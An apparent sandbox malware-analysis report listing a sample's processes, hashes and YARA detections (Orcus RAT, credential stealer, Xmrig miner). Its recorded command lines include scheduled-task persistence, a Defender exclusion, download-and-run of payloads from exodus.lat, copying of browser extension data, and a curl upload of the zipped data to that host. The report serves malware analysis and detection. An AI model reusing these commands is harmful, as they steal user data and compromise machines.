                                                                                            File size:187'904 bytes
                                                                                            MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                            Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:03:32:47
Start date:06/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
Imagebase:0xa40000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:03:32:47
Start date:06/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:03:32:48
Start date:06/12/2024
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
Imagebase:0x7ff672ef0000
File size:170'496 bytes
MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:03:32:49
Start date:06/12/2024
Path:C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr" "C:\Users\user\AppData\Local\CreativePixel Tech\E"
Imagebase:0x630000
File size:893'608 bytes
MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 3%, ReversingLabs
Has exited:true

Target ID:22
Start time:03:35:19
Start date:06/12/2024
Path:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe
Imagebase:0x3e0000
File size:65'440 bytes
MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_OrcusRat, Description: Yara detected Orcus RAT, Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
• Rule: RAT_Orcus, Description: unknown, Source: 00000016.00000002.4561895270.00000000007C2000.00000040.00000400.00020000.00000000.sdmp, Author: J from THL <j@techhelplist.com> with thx to MalwareHunterTeam
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.4603685340.0000000003B81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.4571175471.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:false

Target ID:24
Start time:03:35:34
Start date:06/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\download.bat" "
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:03:35:34
Start date:06/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:03:35:35
Start date:06/12/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:net session
Imagebase:0xde0000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:03:35:35
Start date:06/12/2024
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 session
Imagebase:0x320000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:03:35:35
Start date:06/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Imagebase:0x4b0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:03:35:36
Start date:06/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\checkmiexe.bat" "
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:03:35:36
Start date:06/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runsteal.bat" "
Imagebase:0x1c0000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:03:35:36
Start date:06/12/2024
Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
Imagebase:0x1eb2ab20000
File size:167'936 bytes
MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001F.00000002.4565494964.000001EB2C781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000001F.00000000.3856204224.000001EB2AB22000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
• Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\smartscreen.exe, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 42%, ReversingLabs
Has exited:false

Target ID:32
Start time:03:35:36
Start date:06/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:03:35:36
Start date:06/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff66e660000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:34
Start time:03:35:37
Start date:06/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\user\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
Imagebase:0x4b0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:03:35:37
Start date:06/12/2024
Path:C:\Windows\SysWOW64\net.exe
Wow64 process (32bit):true
Commandline:net session
Imagebase:0xde0000
File size:47'104 bytes
MD5 hash:31890A7DE89936F922D44D677F681A7F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:03:35:37
Start date:06/12/2024
Path:C:\Windows\SysWOW64\net1.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\net1 session
Imagebase:0x320000
File size:139'776 bytes
MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:37
Start time:03:35:38
Start date:06/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\asm'"
Imagebase:0x4b0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:03:35:39
Start date:06/12/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
Imagebase:0x4b0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:03:35:40
Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe') }"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:40
                                                                                            Start time:03:35:41
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:cmd.exe /c "C:\Users\user\AppData\Local\Temp\downloaded_script.bat"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:42
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:43
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:xcopy /E /I "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Chrome\"
                                                                                            Imagebase:0x7a0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921696825.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921605564.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002B.00000002.3921957521.0000000002940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:44
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:xcopy /E /I "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\*" "C:\Users\user\AppData\Local\Temp\ArchiveContents\Edge\"
                                                                                            Imagebase:0x7a0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922955190.000000000282E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3923072888.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000002C.00000002.3922851056.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:45
                                                                                            Start time:03:35:42
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\user\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:46
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:47
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x1ee64180000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002F.00000000.3929689424.000001EE64182000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.4579567004.000001EE7636F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000002F.00000002.4566859084.000001EE65D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exe, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 71%, ReversingLabs
                                                                                            Has exited:false

                                                                                            Target ID:48
                                                                                            Start time:03:35:43
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:curl -s https://api.ipify.org
                                                                                            Imagebase:0x40000
                                                                                            File size:470'528 bytes
                                                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949785259.0000000003090000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949654708.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949588904.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000002.3949654708.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:49
                                                                                            Start time:03:35:45
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:powershell -command "Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip'"
                                                                                            Imagebase:0x4b0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:50
                                                                                            Start time:03:35:46
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                                                                            Imagebase:0x21641230000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000032.00000002.4565651226.0000021642F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            Target ID:51
                                                                                            Start time:03:35:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:52
                                                                                            Start time:03:35:47
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Windows\SysWOW64\curl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:curl -F "file=@C:\Users\user\AppData\Local\Temp\N_user_8.46.123.228.zip" "https://exodus.lat/files/upload.php"
                                                                                            Imagebase:0x40000
                                                                                            File size:470'528 bytes
                                                                                            MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3988717578.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3987839867.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000003.3987493910.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3987947915.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000034.00000002.3988039923.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:53
                                                                                            Start time:03:35:54
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x1f7888f0000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.4579522041.000001F79AD72000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000035.00000002.4579522041.000001F79B391000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B454000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000035.00000002.4566717122.000001F78A821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000035.00000002.4579522041.000001F79B4A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            Target ID:54
                                                                                            Start time:03:36:02
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\smartscreen.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\smartscreen.exe"
                                                                                            Imagebase:0x21533270000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:1FED66D1F6B85BDA20FE0403CA01C9BD
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000036.00000002.4565336493.0000021535001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false

                                                                                            Target ID:55
                                                                                            Start time:03:36:11
                                                                                            Start date:06/12/2024
                                                                                            Path:C:\Users\user\AppData\Local\asm\COMSurrogate.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\AppData\Local\asm\COMSurrogate.exe"
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:167'936 bytes
                                                                                            MD5 hash:77334F046A50530CDC6E585E59165264
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000037.00000002.4566695155.000002748FD21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000037.00000002.4582934656.000002749FD31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:false


                                                                                              Execution Graph

                                                                                              Execution Coverage:17.8%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21%
                                                                                              Total number of Nodes:1482
                                                                                              Total number of Limit Nodes:26
[Execution graph data: the serialized node list (node id, function address, number of API calls, API names and node-to-node edges) that the interactive report renders as a graph; it is not reproduced here. All function addresses fall in the range 0x401000-0x407fff. The reachable nodes call file, registry, clipboard, version-info and window APIs, among them CreateFileW, ReadFile, WriteFile, SetFilePointer, SetFileTime, GetTempFileNameW, RegOpenKeyExW, RegQueryValueExW, RegSetValueExW, RegDeleteValueW, RegDeleteKeyW, OpenClipboard, SetClipboardData, GetFileVersionInfoW, WritePrivateProfileStringW, SHBrowseForFolderW, SHFileOperationW, LoadLibraryExW, GetProcAddress, OpenProcess and MessageBoxIndirectW.]
